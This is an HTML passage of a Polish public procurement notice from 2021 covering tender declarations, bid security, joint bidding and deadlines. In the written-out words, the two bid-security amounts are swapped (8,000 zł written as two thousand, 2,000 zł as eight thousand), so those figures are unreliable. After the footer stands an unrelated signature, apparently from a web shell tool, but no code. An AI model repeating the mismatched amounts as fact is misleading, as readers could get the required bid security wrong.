(wzór),<br/>b) oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – wg zał. <br/>nr 3 do SWZ (wzór),<br/>c) oświadczenie Wykonawcy o niepodleganiu wykluczeniu – wg zał. nr 4 do SWZ <br/>(wzór), <br/>d) oświadczenie o zakresie wykonania zamówienia przez poszczególnych wykonawców <br/>wspólnie ubiegających się o zamówienie – wg zał. nr 5 do SWZ (wzór), <br/>e) zobowiązanie podmiotu udostępniającego zasoby własne – wg. zał. nr 11 do SWZ <br/>(wzór), <br/>f) oświadczenie podmiotu udostępniającego zasoby własne o niepodleganiu <br/>wykluczeniu oraz spełnianiu warunków udziału w postępowaniu – wg. zał. nr 12 do <br/>SWZ,<br/>g) pełnomocnictwo do reprezentowania wykonawcy w niniejszym zamówieniu, jeżeli <br/>wymieniona osoba/osoby nie zostały wskazane do reprezentacji we właściwym <br/>rejestrze lub ewidencji działalności gospodarczej,<br/>h) pełnomocnictwo dla lidera (dotyczy podmiotów wspólnie ubiegających się o <br/>zamówienie tzw. „konsorcja oraz spółek cywilnych”). <br/>i) Oryginał gwarancji lub poręczenia – jeżeli wadium wnoszone jest w innej formie niż <br/>w pieniądzu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wymagania dotyczące wadium w zakresie Części 1 i 2:<br/>Dla Części 1: w wysokości: 8 000,00 zł (słownie: dwa tysiące złotych 00/100).<br/>Dla Częsci 2: w wysokości 2 000,00 zł (słownie: osiem tysięcy złotych 00/100).<br/>Wadium należy wnieść przed upływem terminu składania ofert. <br/>b) Wadium może być wnoszone w pieniądzu, poręczeniach bankowych lub poręczeniach <br/>spółdzielczej kasy oszczędnościowo – kredytowej, z tym że poręczenie kasy jest zawsze <br/>poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, <br/>poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/>z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości <br/>(Dz. U. z 2020r.poz.299). <br/>c) Wadium wnoszone w pieniądzu należy przelać na konto depozytowe w PKO BP–nr <br/>rachunku: 52 10202892 0000 590205908415. <br/>d) Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania <br/>rachunku bankowego zamawiającego.<br/>e) Wadium wnoszone w formie innej niż pieniężna musi być wniesione w oryginale w <br/>formie elektronicznej i musi obejmować cały okres związania ofertą. Gwarancja lub <br/>poręczenie musi zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązane <br/>wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium płatne na <br/>pierwsze pisemne żądanie Zamawiającego. Wadium należy załączyć do zaszyfrowanej <br/>zgodnie z zapisami części VIII pkt 1 SWZ oferty wykonawcy. <br/>f) Dokument, o którym mowa w lit. e) musi być podpisany kwalifikowanym podpisem <br/>elektronicznym przez gwaranta/ poręczyciela. <br/>g) Zwrot wadium nastąpi zgodnie z art. 98 Pzp. h) Zamawiający zatrzymuje wadium <br/>zgodnie z zasadami określonymi w art. 98 ust. 6 PZP <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 2. W toku prowadzonego<br/>postępowania komunikacja pomiędzy zamawiającym a wykonawcami wspólnie ubiegającymi się<br/>o udzielenie zamówienia następować będzie za pośrednictwem lidera (pełnomocnika) o którym<br/>mowa w pkt. 1 w części V SWZ. 3. W przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców, każdy z wykonawców wraz z ofertą składa oświadczenie o niepodleganiu<br/>wykluczeniu wg zał. nr 4 do SWZ (wzór).4. Spółka cywilna, jest kwalifikowana jako wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia dlatego jej wspólnicy zobowiązani są<br/>ustanowić pełnomocnika do reprezentowania w postępowaniu albo reprezentowania w<br/>postępowaniu i zawarcia umowy. Pełnomocnictwo musi być załączone do oferty. Ponadto, każdy<br/>ze wspólników spółki cywilnej zobowiązany jest do złożenia wraz z ofertą oświadczenia o<br/>niepodleganiu wykluczeniu wg zał. nr 4 do SWZ (wzór).5. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia (wspólnicy spółki cywilnej) składają wraz z ofertą oświadczenie o<br/>zakresie wykonania zamówienia przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia – wg zał. nr 5 do SWZ (wzór). 6. Wszyscy wykonawcy składający wspólną ofertę<br/>będą ponosić odpowiedzialność solidarną za wykonanie umowy i wniesienie należytego<br/>wykonania umowy. Zamawiający może w ramach odpowiedzialności solidarnej żądać<br/>wykonania umowy od wszystkich wykonawców łącznie lub od każdego z osobna. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza zmiany postanowień zawartej umowy zgodnie z przesłankami<br/>określonymi w Projektowanych Postanowieniach Umowy - załącznik nr 2 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem "Formularza do złożenia, zmiany, wycofania oferty" dostępnego na ePUAP i udostępnionego na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje wykluczenie wykonawcy w zakresie podstaw określonych w art.108ust.<br/>1 pkt. 1-6 oraz art. 109 ust. 1 pkt. 4 Pzp.2. Wykonawcy, jeżeli ma lub miał interes w uzyskaniu<br/>danego zamówienia oraz poniósł lub może ponieść szkodę w wyniku naruszenia przez<br/>zamawiającego przepisów Pzp przysługują środki ochrony prawnej określone w Dziale IX Pzp</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-10 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com